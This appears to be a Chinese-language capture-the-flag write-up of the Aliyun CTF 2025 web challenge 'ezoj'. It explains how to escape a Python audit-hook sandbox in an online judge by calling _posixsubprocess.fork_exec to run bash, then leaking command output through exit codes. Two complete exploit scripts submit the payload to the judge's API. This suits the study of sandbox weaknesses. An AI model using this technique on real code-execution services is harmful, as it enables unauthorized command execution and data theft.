Aliyun CTF 2025 web ezoj
文章目录
- ezoj
ezoj
进来一看是算法题,先做了试试看,gpt写了一个高效代码通过了
通过后没看见啥,根据页面底部提示去/source看到源代码,没啥思路,直接看wp吧,跟算法题没啥关系,关键是去看源码
def audit_checker(event,args):
if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
raise RuntimeError
sys.addaudithook(audit_checker)
好了,现在你已经清楚了,有这样一个函数,只允许白名单上的东西执行。其他诸如system和eval的代码执行不了。接下来利用程序退出码获取python版本信息,退出码就相当于return 0,区别在于这里return的值可控,通过version_info获取版本信息
import sys
sys.exit(sys.version_info[0])
得到Python版本3.12.9,接着看,就算导入os模块,也不能执行system命令
但是可以导入内部模块,即一些隐藏的可以用来执行命令的函数
如_posixsubprocess的fork_exe()函数,它的底层是c代码,所以可以绕过安全审计
在_posixsubprocess模块中有一个c2pwrite参数,可以将子进程的输出数据重定向到父进程,可以利用这一点将数据带出来。
import requests
URL
= "http://10.253.253.1/api/submit"
CODE_TEMPLATE
= """
import _posixsubprocess
import os
import time
import sys
std_pipe = os.pipe()
err_pipe = os.pipe()
_posixsubprocess.fork_exec(
(b"/bin/bash",b"-c",b"ls /"),
[b"/bin/bash"],
True,
(),
None,
None,
-1,
-1,
-1,
std_pipe[1], #c2pwrite
-1,
-1,
*(err_pipe),
False,
False,
False,
None,
None,
None,
-1,
None,
False, )
time.sleep(0.1)
content = os.read(std_pipe[0],1024)
content_len = len(content)
if {loc} < content_len:
sys.exit(content[{loc}])
else:
sys.exit(255)
"""
command
="ls /"
received = ""
for i in range(254):
code = CODE_TEMPLATE.format(loc=i,command=command)
data = {"problem_id":0,"code":code}
resp = requests.post(URL,json=data)
resp_data = resp.json()
assert(resp_data["status"] == "RE")
ret_loc = resp_data["message"].find("ret=")
ret_code = resp_data["message"][ret_loc+4:]
if ret_code == "255":
break
received += chr(int(ret_code))
print(received)
os.pipe创建通信管道
这里学到一个很厉害的技巧:使用管道,如果信息直接输出到终端,且不给回显,就可以通过管道给它先放进去,再从管道的另一端去读,可以采用类似布尔盲注的思想拿出信息,当然这里没这么麻烦。
_posixsubprocess.fork_exec(
(b"/bin/bash", b"-c", b"ls /"), # ① 要执行的命令
[b"/bin/bash"], # ② argv(程序参数)
True, # ③ 是否关闭所有文件描述符(close_fds)
(), # ④ 预执行(preexec_fn)
None, None, # ⑤ 用户ID(UID)和 组ID(GID)
-1, -1, -1, # ⑥ 文件描述符重定向
std_pipe[1], # c2pwrite # ⑦ stdout 重定向到管道
-1, -1, # ⑧ stdin, stderr 处理
*(err_pipe), # ⑨ stderr 绑定到 err_pipe
False, False, False, # ⑩ 设置子进程行为
None, None, None, # ⑪ 进程优先级和调度相关
-1, None, False # ⑫ 其他控制参数
)
启动bash大概就相当于启动cmd这个意思
第二个参数只放程序本身的名字,再往下看,是一个经验性的东西,由于 os.read 可能会将程序卡住,因此在 os.read 之前先sleep⼀下。到这里payload的构建就没有什么问题了,我们再来看看处理数据的脚本怎么构建,先看题目源码
code就是我们构建的payload,通过程序退出码逐个返回信息
这里我们显然不能直接提交到oj平台,所以id设置为0
如果返回状态码为RE说明sys.exit()触发了
import requests
url="http://121.41.238.106:50670/api/submit"
CODE_TEMPLATE='''
import _posixsubprocess
import os
import time
import sys
std_pipe=os.pipe()
err_pipe=os.pipe()
_posixsubprocess.fork_exec(
(b"/bin/bash",b"-c",b"ls /"),
[b"/bin/bash"],
True,
(),
None,
None,
-1,
-1,
-1,
std_pipe[1], #c2pwrite
-1,
-1,
*(err_pipe),
False,
False,
False,
None,
None,
None,
-1,
None,
False, )
time.sleep(0.1)
content=os.read(std_pipe[0],1024)
content_length=len(content)
if {log}<content_length:
sys.exit(content[{log}])
else:
sys.exit(255)'''
rec=""
for i in range(1,244):
code=CODE_TEMPLATE.format(log=i)
data={
"problem_id":0,
"code":code
}
response=requests.post(url=url,json=data)
redata=response.json()
assert redata["status"]=="RE"
ret_loc=redata["message"].find("ret=")
ret_code=redata["message"][ret_loc+4:]
if ret_code=="255":
break
else:
rec+=chr(int(ret_code))
print(rec)